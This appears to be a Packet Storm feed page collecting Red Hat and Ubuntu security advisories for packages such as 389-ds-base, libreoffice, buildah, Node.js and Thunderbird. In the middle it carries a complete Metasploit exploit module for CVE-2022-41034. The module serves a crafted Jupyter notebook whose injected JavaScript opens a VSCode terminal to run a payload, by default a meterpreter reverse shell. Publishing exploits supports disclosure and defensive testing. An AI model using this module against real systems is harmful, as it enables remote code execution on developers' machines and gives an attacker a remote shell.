Red Hat Security Advisory 2024-3837-03 - An update for 389-ds-base is now available for Red Hat Enterprise Linux 9. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3837.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: 389-ds-base security updateAdvisory ID:        RHSA-2024:3837-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:3837Issue date:         2024-06-12Revision:           03CVE Names:          CVE-2024-2199====================================================================Summary: An update for 389-ds-base is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact ofImportant. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:389 Directory Server is an LDAP version 3 (LDAPv3) compliant server. The basepackages include the Lightweight Directory Access Protocol (LDAP) server andcommand-line utilities for server administration.Security Fix(es):* 389-ds-base: potential denial of service via specially crafted kerberos AS-REQ request (CVE-2024-3657)* 389-ds-base: Malformed userPassword may cause crash at do_modify in slapd/modify.c (CVE-2024-2199)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-2199References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2267976https://bugzilla.redhat.com/show_bug.cgi?id=2274401

Red Hat Security Advisory 2024-3837-03

Red Hat Security Advisory 2024-3835-03 - An update for libreoffice is now available for Red Hat Enterprise Linux 9.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3835.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: libreoffice security updateAdvisory ID:        RHSA-2024:3835-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:3835Issue date:         2024-06-12Revision:           03CVE Names:          CVE-2023-6185====================================================================Summary: An update for libreoffice is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:LibreOffice is an open source, community-developed office productivity suite. It includes key desktop applications, such as a word processor, a spreadsheet, a presentation manager, a formula editor, and a drawing program. LibreOffice replaces OpenOffice and provides a similar but enhanced and extended office suite.Security Fix(es):* libreoffice: Improper Input Validation leading to arbitrary gstreamer plugin execution (CVE-2023-6185)* libreoffice: Insufficient macro permission validation leading to macro execution (CVE-2023-6186)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-6185References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2254003https://bugzilla.redhat.com/show_bug.cgi?id=2254005

Red Hat Security Advisory 2024-3835-03

Red Hat Security Advisory 2024-3834-03 - An update for gdk-pixbuf2 is now available for Red Hat Enterprise Linux 9.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3834.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: gdk-pixbuf2 security updateAdvisory ID:        RHSA-2024:3834-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:3834Issue date:         2024-06-12Revision:           03CVE Names:          CVE-2022-48622====================================================================Summary: An update for gdk-pixbuf2 is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The gdk-pixbuf2 packages provide an image loading library that can be extendedby loadable modules for new image formats. It is used by toolkits such as GTK+or clutter.Security Fix(es):* gdk-pixbuf2: heap memory corruption on gdk-pixbuf (CVE-2022-48622)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVE page(s)listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2022-48622References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2260545

Red Hat Security Advisory 2024-3834-03

Red Hat Security Advisory 2024-3831-03 - An update for containernetworking-plugins is now available for Red Hat Enterprise Linux 9. Issues addressed include a memory exhaustion vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3831.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: containernetworking-plugins security and bug fix update  
Advisory ID:        RHSA-2024:3831-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:3831  
Issue date:         2024-06-12  
Revision:           03  
CVE Names:          CVE-2023-45290  
====================================================================

Summary: 

An update for containernetworking-plugins is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The Container Network Interface (CNI) project consists of a specification and libraries for writing plug-ins for configuring network interfaces in Linux containers, along with a number of supported plug-ins. CNI concerns itself only with network connectivity of containers and removing allocated resources when the container is deleted. 

Security Fix(es):

* golang: net/http: memory exhaustion in Request.ParseMultipartForm (CVE-2023-45290)

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-45290

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2268017

Red Hat Security Advisory 2024-3831-03

Red Hat Security Advisory 2024-3830-03 - An update for gvisor-tap-vsock is now available for Red Hat Enterprise Linux 9. Issues addressed include a memory exhaustion vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3830.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: gvisor-tap-vsock security and bug fix updateAdvisory ID:        RHSA-2024:3830-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:3830Issue date:         2024-06-12Revision:           03CVE Names:          CVE-2023-45290====================================================================Summary: An update for gvisor-tap-vsock is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:A replacement for libslirp and VPNKit, written in pure Go. It is based on the network stack of gVisor and is used to provide networking for podman-machine virtual machines. Compared to libslirp, gvisor-tap-vsock brings a configurable DNS server and dynamic port forwarding.Security Fix(es):* golang: net/http: memory exhaustion in Request.ParseMultipartForm (CVE-2023-45290)Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-45290References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2268017

Red Hat Security Advisory 2024-3830-03

Red Hat Security Advisory 2024-3827-03 - An update for buildah is now available for Red Hat Enterprise Linux 9. Issues addressed include memory exhaustion and resource exhaustion vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3827.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: buildah security and bug fix update  
Advisory ID:        RHSA-2024:3827-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:3827  
Issue date:         2024-06-12  
Revision:           03  
CVE Names:          CVE-2023-45290  
====================================================================

Summary: 

An update for buildah is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The buildah package provides a tool for facilitating building OCI container images. Among other things, buildah enables you to: Create a working container, either from scratch or using an image as a starting point; Create an image, either from a working container or using the instructions in a Dockerfile; Build both Docker and OCI images. 

Security Fix(es):

* golang: net/http: memory exhaustion in Request.ParseMultipartForm (CVE-2023-45290)

* jose-go: improper handling of highly compressed data (CVE-2024-28180)

* buildah: jose: resource exhaustion (CVE-2024-28176)

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-45290

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2268017  
https://bugzilla.redhat.com/show_bug.cgi?id=2268820  
https://bugzilla.redhat.com/show_bug.cgi?id=2268854

Red Hat Security Advisory 2024-3827-03

VSCode when opening a Jupyter notebook (.ipynb) file bypasses the trust model. On versions v1.4.0 through v1.71.1, its possible for the Jupyter notebook to embed HTML and javascript, which can then open new terminal windows within VSCode. Each of these new windows can then execute arbitrary code at startup. During testing, the first open of the Jupyter notebook resulted in pop-ups displaying errors of unable to find the payload exe file. The second attempt at opening the Jupyter notebook would result in successful execution. Successfully tested against VSCode 1.70.2 on Windows 10.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpServer  def initialize(info = {})    super(      update_info(        info,        'Name' => 'VSCode ipynb Remote Development RCE',        'Description' => %q{          VSCode when opening an Jupyter notebook (.ipynb) file bypasses the trust model.          On versions v1.4.0 - v1.71.1, its possible for the Jupyter notebook to embed          HTML and javascript, which can then open new terminal windows within VSCode.          Each of these new windows can then execute arbitrary code at startup.          During testing, the first open of the Jupyter notebook resulted in pop-ups          displaying errors of unable to find the payload exe file. The second attempt          at opening the Jupyter notebook would result in successful exeuction.          Successfully tested against VSCode 1.70.2 on Windows 10.        },        'License' => MSF_LICENSE,        'Author' => [          'h00die', # metasploit module          'Zemnmez'        ],        'References' => [          ['URL', 'https://github.com/google/security-research/security/advisories/GHSA-pw56-c55x-cm9m'],          ['CVE', '2022-41034'],          ['URL', 'https://github.com/andyhsu024/CVE-2022-41034']        ],        'DisclosureDate' => '2022-11-22',        'Privileged' => false,        'Arch' => ARCH_CMD,        'Stance' => Stance::Aggressive,        'Payload' => { 'BadChars' => '&"' },        'Targets' => [          [            'Windows',            {              'Platform' => 'win',              'DefaultOptions' => {                'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp'              }            }          ],          [            'Linux File-Dropper',            {              'Platform' => 'linux',              'DefaultOptions' => {                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'WfsDelay' => 3_600, # 1hr          'URIPATH' => 'project.ipynb'        },        'Notes' => {          'Stability' => [CRASH_SAFE],          # on windows it will say the final payload can't be found          # however, it is, seems to be a timing issue, 2nd exploit attempt          # works perfectly          'Reliability' => [REPEATABLE_SESSION, FIRST_ATTEMPT_FAIL],          'SideEffects' => [SCREEN_EFFECTS]        }      )    )    register_options(      [        OptString.new('PAYLOAD_FILENAME', [ false, 'Name of the payload file - only required when exploiting on Linux.', 'shell.sh' ]),        OptString.new('WRITABLE_DIR', [ false, 'Name of the writable directory containing the payload file - required when exploiting on Linux .', '/tmp/' ]),      ]    )  end  def check    CheckCode::Unsupported  end  def exploit    unless datastore['URIPATH'].end_with? '.ipynb'      fail_with(Failure::BadConfig, 'URIPATH must end in .ipynb for exploit to be successful')    end    print_status('Starting up web service...')    start_service    sleep(datastore['WFSDELAY'])  end  def on_request_uri(cli, request)    super unless request.uri.end_with? datastore['URIPATH']    if target['Platform'] == 'win'      config = { 'executable' => 'cmd.exe', 'args' => "/c #{payload.raw}" }    else      config = { 'executable' => "/#{datastore['WRITABLE_DIR']}/#{datastore['PAYLOAD_FILENAME']}" }    end    pload = JSON.dump({ 'config' => config })    pload = CGI.escape(pload).gsub('+', '%20') # XXX not sure if this is needed or not, but it works    ipynb = %|{"cells": [  {  "cell_type": "markdown",  "metadata": {},  "source": [    "<img src=a onerror=\\"let q = document.createElement('a');q.href='command:workbench.action.terminal.new?#{pload}';document.body.appendChild(q);q.click()\\"/>"  ]  }]}|    send_response(cli, ipynb, {      'Connection' => 'close',      'Pragma' => 'no-cache',      'Access-Control-Allow-Origin' => '*'    })    print_status("Sent #{datastore['URIPATH']} to #{cli.peerhost}")  endend

VSCode ipynb Remote Code Execution

Ubuntu Security Notice 6822-1 - It was discovered that Node.js incorrectly handled certain inputs when it is using the policy mechanism. If a user or an automated system were tricked into opening a specially crafted input file, a remote attacker could possibly use this issue to bypass the policy mechanism. It was discovered that Node.js incorrectly handled certain inputs when it is using the policy mechanism. If a user or an automated system were tricked into opening a specially crafted input file, a remote attacker could possibly use this issue to perform a privilege escalation.

    ==========================================================================Ubuntu Security Notice USN-6822-1June 10, 2024nodejs vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 23.10- Ubuntu 22.04 LTSSummary:Several security issues were fixed in Node.js.Software Description:- nodejs: An open-source, cross-platform JavaScript runtime environment.Details:It was discovered that Node.js incorrectly handled certain inputs when it isusing the policy mechanism. If a user or an automated system were tricked intoopening a specially crafted input file, a remote attacker could possibly usethis issue to bypass the policy mechanism. (CVE-2023-32002, CVE-2023-32006)It was discovered that Node.js incorrectly handled certain inputs when it isusing the policy mechanism. If a user or an automated system were tricked intoopening a specially crafted input file, a remote attacker could possibly usethis issue to perform a privilege escalation. (CVE-2023-32559)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 23.10   libnode108                      18.13.0+dfsg1-1ubuntu2.3   nodejs                          18.13.0+dfsg1-1ubuntu2.3Ubuntu 22.04 LTS   libnode72                       12.22.9~dfsg-1ubuntu3.6   nodejs                          12.22.9~dfsg-1ubuntu3.6In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6822-1   CVE-2023-32002, CVE-2023-32006, CVE-2023-32559Package Information:   https://launchpad.net/ubuntu/+source/nodejs/18.13.0+dfsg1-1ubuntu2.3   https://launchpad.net/ubuntu/+source/nodejs/12.22.9~dfsg-1ubuntu3.6

Ubuntu Security Notice USN-6822-1

Red Hat Security Advisory 2024-3790-03 - OpenShift API for Data Protection 1.3.2 is now available. Issues addressed include a memory exhaustion vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3790.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: OpenShift API for Data Protection (OADP) 1.3.2 security and bug fix update  
Advisory ID:        RHSA-2024:3790-03  
Product:            OpenShift API for Data Protection  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:3790  
Issue date:         2024-06-11  
Revision:           03  
CVE Names:          CVE-2023-45289  
====================================================================

Summary: 

OpenShift API for Data Protection (OADP) 1.3.2 is now available.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

OpenShift API for Data Protection (OADP) enables you to back up and restore application resources, persistent volume data, and internal container images to external backup storage. OADP enables both file system-based and snapshot-based backups for persistent volumes.

Security Fix(es) from Bugzilla:

* golang: net/http: memory exhaustion in Request.ParseMultipartForm (CVE-2023-45290)

* golang: net/http/cookiejar: incorrect forwarding of sensitive headers and cookies on HTTP redirect (CVE-2023-45289)

* golang: crypto/x509: Verify panics on certificates with an unknown public key algorithm (CVE-2024-24783)

* golang: net/mail: comments in display names are incorrectly handled (CVE-2024-24784)

* golang: html/template: errors returned from MarshalJSON methods may break template escaping (CVE-2024-24785)

For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-45289

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2268017  
https://bugzilla.redhat.com/show_bug.cgi?id=2268018  
https://bugzilla.redhat.com/show_bug.cgi?id=2268019  
https://bugzilla.redhat.com/show_bug.cgi?id=2268021  
https://bugzilla.redhat.com/show_bug.cgi?id=2268022

Red Hat Security Advisory 2024-3790-03

Red Hat Security Advisory 2024-3784-03 - An update for thunderbird is now available for Red Hat Enterprise Linux 8.10. Issues addressed include bypass and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3784.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: thunderbird security update  
Advisory ID:        RHSA-2024:3784-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:3784  
Issue date:         2024-06-10  
Revision:           03  
CVE Names:          CVE-2024-4367  
====================================================================

Summary: 

An update for thunderbird is now available for Red Hat Enterprise Linux 8.10.

Red Hat Product Security has rated this update as having a security impact of  
Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 115.11.0.

Security Fix(es):

* firefox: Arbitrary JavaScript execution in PDF.js (CVE-2024-4367)

* firefox: IndexedDB files retained in private browsing mode (CVE-2024-4767)

* firefox: Potential permissions request bypass via clickjacking (CVE-2024-4768)

* firefox: Cross-origin responses could be distinguished between script and  
non-script content-types (CVE-2024-4769)

* firefox: Use-after-free could occur when printing to PDF (CVE-2024-4770)

* firefox: Memory safety bugs fixed in Firefox 126, Firefox ESR 115.11, and  
Thunderbird 115.11 (CVE-2024-4777)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-4367

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2280382  
https://bugzilla.redhat.com/show_bug.cgi?id=2280383  
https://bugzilla.redhat.com/show_bug.cgi?id=2280384  
https://bugzilla.redhat.com/show_bug.cgi?id=2280385  
https://bugzilla.redhat.com/show_bug.cgi?id=2280386  
https://bugzilla.redhat.com/show_bug.cgi?id=2280387

Tag

#js